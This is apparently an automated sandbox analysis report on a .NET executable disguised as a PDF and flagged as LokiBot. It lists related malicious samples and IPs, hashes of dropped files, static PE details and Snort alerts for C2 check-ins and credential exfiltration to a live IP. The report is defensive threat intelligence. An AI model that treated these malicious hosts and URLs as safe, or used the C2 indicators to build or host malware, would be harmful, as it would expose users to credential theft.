	OX-IN-031-17_ JPE.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	152.32.189.143
	Curriculum Vitae Catalina Munoz.exe	Get hash	malicious	FormBook	Browse	152.32.189.143
	https://smmcbybf.com/	Get hash	malicious	Unknown	Browse	101.36.105.98
	JvULMWY21C.elf	Get hash	malicious	Unknown	Browse	103.218.244.205
	http://www.globaltimes.cn	Get hash	malicious	HTMLPhisher	Browse	128.14.246.120
	SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exe	Get hash	malicious	Unknown	Browse	128.14.246.120
	SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exe	Get hash	malicious	Unknown	Browse	128.14.246.120
	0ekwLomWKo.exe	Get hash	malicious	FormBook	Browse	152.32.189.143
TRELLIAN-AS-APTrellianPtyLimitedAU	http://www.adrus.com/extranet/csxEquipment/EquipmentSpecifications/cs_SpecificationMainPage.htm	Get hash	malicious	Unknown	Browse	103.224.182.246
	Details of Your Etisalat Summary Bill for the Month of May 2024.exe	Get hash	malicious	FormBook	Browse	103.224.212.212
	file.exe	Get hash	malicious	CMSBrute	Browse	103.224.212.214
	HELP_DECRYPT.HTML	Get hash	malicious	Unknown	Browse	103.224.212.237
	SlHgSOYcMY.exe	Get hash	malicious	Unknown	Browse	103.224.212.34
	Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm	Get hash	malicious	FormBook	Browse	103.224.212.214
	Swift Copy.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.217
	0rVlyonS3R.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.246
	https://upsmychoicedeals.com	Get hash	malicious	Unknown	Browse	103.224.212.216
	xQAP5P41U8DI.exe	Get hash	malicious	Remcos	Browse	103.224.182.242
AS40676US	PO#34316_20240528.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	skt.mpsl.elf	Get hash	malicious	Mirai	Browse	103.78.120.37
	https://github.com/electerm/electerm/releases/download/v1.39.18/electerm-1.39.18-win-x64-installer.exe	Get hash	malicious	Unknown	Browse	182.255.33.134
	DHL Receipt_20458077822.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	SC_TR23052024.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	Purchase Inquiry_#466789.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	file.exe	Get hash	malicious	Unknown	Browse	41.216.183.25
	file.exe	Get hash	malicious	Unknown	Browse	41.216.183.25
	fdftMGtnix.elf	Get hash	malicious	Unknown	Browse	23.133.14.61
	n4WgIM7VfS.elf	Get hash	malicious	Mirai	Browse	162.73.212.211

Process:	C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YLc7afPlL4RjCeK.exe.log

Process:	C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.19752173423261
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhmvmelb0O0bihmc5mel6CUXyhmdmelbxdB6hmCmelz0Jahm7melbNdL:YqHZ6T06McuIb0O0biccUIDUXycAIbx3
MD5:	B8F1026E2F105E444BC295DDE77C6D16
SHA1:	830D4EC90E5AE43B829544F48306DFF9633B0D1A
SHA-256:	CA99DE552553F6681A5F4B51FCFC0191BCE4EE8FC930C16FF2B95169E3B22F9A
SHA-512:	FD9506754FD7CE466C1B6887C942357FB368E03A6CF0FE81D143B657A86B3454CAF42F8CF2678B62E1FDC5CB93ABEA790AE3DE857F4486B8292DFB59951E7B7F
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":1276605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":1266605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":1256605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":1246605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":1236605664,"LastSwitchedHighPart":31061866,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":1226605664,"LastSwitchedHighPart":31061866,

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379540626579189
Encrypted:	false
SSDEEP:	48:NlWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:NlLHxvIIwLgZ2KRHWLOug8s
MD5:	8AD5AD7ED1691653920E59B2A30B77AC
SHA1:	F4D5B6E87F15E39E7FC72BF84DFA0E691707C4FB
SHA-256:	1AEA9041E402A3D467074A27374DC8667D43E8F9203CE877C2A43DB08479DFBE
SHA-512:	1BC88259E38BEE7A34E5E5B791BA9C52B01D77794C1920A7DE797F3C29AA40E83898E794EF17F8A91A1118621DB9492220043C25BD32EAFDB7A6C1AD7D62087C
Malicious:	false
Preview:	@...e.................................[..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe

Process:	C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	616448
Entropy (8bit):	7.956733647423217
Encrypted:	false
SSDEEP:	12288:9dJS4VjRSQw4U/S9cG02IDeWnco9Lof/Kg/iHFjALKLPVD3CxDU:tScjRSQwB69cGrIDHnco9G/Kg2JcCtz0
MD5:	6F4CDBC9CAC665D375E1F28138E79428
SHA1:	2B4DD4CFE4689B48ADE011700F122884DB2F3CDD
SHA-256:	0DF2C5B03A9E6D5608464106447DA62E5DBC76FCA6B3C02D96B47B96E08906F9
SHA-512:	593B70E38B443732D606560F09E8EDADA2747100DB52B8530A5512BFA38EC98857DDCA9BC680408453B3277CE6810EE286483A21F9D35DFCD43289F0DA639F9B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Vf..............0..P...........n... ........@.. ....................................@..................................m..O....................................O..T............................................ ............... ..H............text... N... ...P.................. ..`.rsrc................R..............@..@.reloc...............f..............@..B.................m......H........T...P......&...0...h...........................................~.(.......r...p}.....r...p}......{...."..}......{...."..}.......0..Q.........}......}.....r...p}.....r...p}.....s....}.....s....}......}.....( ......(........0............{....o!.......{....o"....o#...o$......+....o%.... ......,....+....X...o&.........-.........,"..{.....o......{....r...po......++..{.......o'...o......{.......Xo(...o..........0............{....o!.....{....o"....o#...o$.....{....o.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5lilsg3.3ja.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iiadnpq2.tc0.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxdabfe2.t00.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfc1zwdm.tck.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2m5vroj.yjp.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2zlvrst.j4j.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nz5npxdn.4p1.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlk3jjh4.lcl.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\1d921b7dbd459b1bfc7fa12af4fbde00_9e146be9-c76a-4720-bcdb-53011b87bd06

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
SSDEEP:	3:/lwltJ:Wz
MD5:	3D7D230E8E9B4E8202935E38050E13E5
SHA1:	DFABCB8DCBC48AB136F6F87A29BF4A7C9CCCCAAF
SHA-256:	269E9F79960D5201DA265CEF43575B1EF31644174DA7A9AB23501AD3A0CACFC3
SHA-512:	02BAF2F6CE0222EBFD4186641AC8F8BF8C54D0184A6C4C85F720171EEF8B1871ACCC9F3E522B80C8814428F52B007CE321312A76B4538D59E4A436D43011FF30
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.950308586261336
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Ajanlatkeres_2024.05.29.PDF.exe
File size:	524'288 bytes
MD5:	cff39149d540e851536383f64d5f5568
SHA1:	2cd49c6f28ecea254e22a75e3e77092a67d26774
SHA256:	795af0703ab2ab7cfcfcc38449e7da1a20967be437e5877ee27da317b3991357
SHA512:	0f3eb77eb9396ec5ec63fc166e12167bf651e433b5c7831935ed2c965eed85b94b9893e6d20d207473f126b273f60c4b6378859b85613cc630acd7c7b70a6ba6
SSDEEP:	12288:UidJS4V9ulMb8Z6j2B0TM4kQhrLO9rAq7BH7Q4a2Y4tS87W:5ScN4ZsvTM4DhXfIBUa17W
TLSH:	16B4121127D4C799C4BD97B22C2270A1C7317A202569FE2C9EE2418A1A2E7855F72F7E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Vf..............0.............V.... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	62ceac86b2968ea2

Static PE Info

General

Entrypoint:	0x480756
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6656F290 [Wed May 29 09:17:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x80701	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x82000	0x13dc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x84000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7e8d0	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7e75c	0x7e800	eacdc5859d29c2f62e1cf9e6b45f8951	False	0.95995321763834	data	7.9600603885333365	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x82000	0x13dc	0x1400	8301550034ba726d731af7d0a56ae498	False	0.33671875	data	4.897116852731504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x84000	0xc	0x200	c3bb697572015bdcaeb3886c6309e90c	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x82130	0xda8	Device independent bitmap graphic, 26 x 64 x 32, image size 3328	0.2823226544622426
RT_GROUP_ICON	0x82ed8	0x14	data	1.1
RT_VERSION	0x82eec	0x304	data	0.43134715025906734
RT_MANIFEST	0x831f0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/29/24-15:42:47.538291	TCP	2025381	ET TROJAN LokiBot Checkin	49728	80	192.168.2.9	45.61.137.215
05/29/24-15:42:52.927476	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49730	80	192.168.2.9	45.61.137.215
05/29/24-15:43:28.214472	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.9	45.61.137.215
05/29/24-15:45:23.375856	TCP	2025381	ET TROJAN LokiBot Checkin	49789	80	192.168.2.9	45.61.137.215
05/29/24-15:45:28.962608	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49791	80	192.168.2.9	45.61.137.215
05/29/24-15:43:22.752549	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.9	45.61.137.215
05/29/24-15:43:28.214472	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.9	45.61.137.215
05/29/24-15:42:52.927476	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49730	80	192.168.2.9	45.61.137.215
05/29/24-15:42:55.680526	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.9	45.61.137.215
05/29/24-15:46:10.058300	TCP	2025381	ET TROJAN LokiBot Checkin	49808	80	192.168.2.9	45.61.137.215
05/29/24-15:42:36.746086	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.9	45.61.137.215
05/29/24-15:42:10.038270	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49712	80	192.168.2.9	45.61.137.215
05/29/24-15:44:39.311748	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.9	45.61.137.215
05/29/24-15:43:30.801731	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.9	45.61.137.215
05/29/24-15:44:31.132505	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.9	45.61.137.215
